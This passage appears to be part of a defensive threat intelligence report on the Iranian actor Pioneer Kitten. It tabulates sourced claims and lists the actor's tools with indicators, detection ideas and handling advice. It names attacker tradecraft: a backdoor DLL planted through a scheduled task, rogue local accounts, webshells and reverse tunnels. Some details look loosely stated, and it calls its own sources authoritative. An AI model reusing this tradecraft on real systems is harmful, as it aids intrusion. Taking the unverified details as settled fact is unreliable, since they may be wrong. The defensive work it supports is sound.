| Detected exploitation of F5 CVE-2022-1388 by Pioneer Kitten | HHS HC3 Analyst Note【31†L210-L217】 | “security researchers confirmed that Iranian threat actor Pioneer Kitten had been observed exploiting the vulnerability [CVE-2022-1388]”【31†L210-L217】. | Source-reported | A | High | |
| Webshell files and scheduled task for persistence | FBI/CISA AA24-241A【41†L239-L247】 | “Create malicious scheduled task SpaceAgentTaskMgrSHR…load a payload from version.dll…Place a malicious backdoor version.dll in C:\Windows\ADFS”【41†L239-L247】. | Source-reported | A | High | |
| Creates local accounts (e.g. “IIS_Admin”) | FBI/CISA AA24-241A【11†L272-L281】 | “The group creates local accounts on victim networks… Observed account names include: … ‘IIS_Admin’”【11†L272-L281】. | Source-reported | B (vendor) | High | (Cited vendor blog summary of FBI data) |
(Full evidence register with all claims would include every sourced statement above.)
Tool-Intelligence Updates (sample)
(For tools-intel.csv format)
- AnyDesk (Remote Access Software) – Type: C2 (remote desktop). Actor Confidence: High (observed installed by actors)【42†L298-L302】. Behavior: Establish backup access; connections on 7070/TCP. IOC: Official domain anydesk.com, vendor hashes. Source: FBI/CISA Advisory. Detection: Monitor for anydesk.exe installs/network sessions. Handling: Uninstall on non-admin hosts; block endpoints.
- MeshCentral (Remote Management) – Type: Remote Admin. Confidence: High. Behavior: Deployed on servers for admin control【41†L247-L250】. IOC: Known installer names (meshcentral.exe). Source: FBI/CISA Advisory. Detection: Services listening on default port 443 or 8443; unknown SSL certs. Handling: Remove if not business-justified.
- ChinaChopper (Webshell) – Type: Webshell. Confidence: High. Behavior: PHP-based reverse-shell on compromised web servers【37†L581-L590】. IOC: Signature bytes of ChinaChopper; domain files.catbox[.]moe seen in use【42†L281-L288】. Source: Fortinet Threat Profile. Detection: Scan web roots for known shell content; anomaly in web logs. Handling: Remove backdoors, patch exploited devices.
- 7-Zip / WinRAR – Type: Compression Utility. Confidence: Medium. Behavior: Used to archive exfil/data drop. IOC: Process execution; archive files with logs or database exports. Source: Fortinet Threat Profile【37†L581-L590】. Detection: Monitor large output archives; inspect their contents. Handling: Monitor usage on servers with access to sensitive data.
- Ligolo / Ngrok – Type: Tunneling Tools (C2). Confidence: High. Behavior: Outbound reverse tunnels to external servers【42†L299-L303】. IOC: Traffic to *.ngrok[.]io or Ligolo default ports. Source: FBI/CISA Advisory. Detection: DNS logs for ngrok; network flows to unusual endpoints. Handling: Block known domains if not allowed; inspect SSL cert.
Navigation/Crosslink Recommendations
- Actor Page: Link to Pioneer Kitten actor profile (CrowdStrike G0117, Mitre).
- Tool Pages: Update detection/hunt sections on AnchorWalker, AnyDesk, Ligolo, MeshCentral, ChinaChopper, etc., with evidence of use by this actor.
- TTP Matrix: Ensure mapping of the above techniques (especially edge device exploits and webshells) is updated under Pioneer Kitten row.
- Hunts/Detections: Create or link to sigma rules for Netscaler webshell detection, Apache logs for ChinaChopper, AD account creation alerts (sample names), unusual scheduled tasks.
- Worked Cases: Document Pay2Key (Dec 2020 – Israel) and the May 2024 US municipal compromise (if publicly known) as example incidents.
- Persona Claims: Mark claims by social media personas (xplfinder, Br0k3r) as speculative in persona register, unless tied to technical evidence.
Gaps and Follow-up
- Israeli Victims: No new public incident since 2020; require liaison with Israeli CERTs or critical infra operators for logs/IOCs. Needed: Confirmed logs from an Israeli net showing these TTPs.
- Tool Families: Some tools listed (HanifNet, HXLibrary) are proprietary/undocumented. Needed: File samples or YARA for these malware.
- Affiliate Hand-off: Technical details of ransomware payloads used post-handoff remain unclear. Needed: Forensics of any known Pioneer-Kitten–seeded ransomware incident to validate process.
- Funding/Structure: While IRGC/Ministry ties are assessed, the exact chain of command is unknown. Needed: Human intel or leak indicating unit/responsibility.
- Operational Status: Fortinet suggests activity through Feb 2025; no clear info if group continues beyond 2024. Needed: Continual monitoring of intelligence and CISA updates in 2025-2026.
Sources: FBI/CISA joint CSA AA24-241A【4†L27-L34】【42†L304-L313】; CISA technical advisories【25†L68-L72】【41†L239-L247】【42†L298-L303】; Fortinet and vendor threat reports【31†L219-L228】【37†L517-L523】; and related CTI blog analyses【11†L248-L257】【17†L300-L308】, accessed May 2026. All cited sources are live and authoritative; reliability ratings are noted above.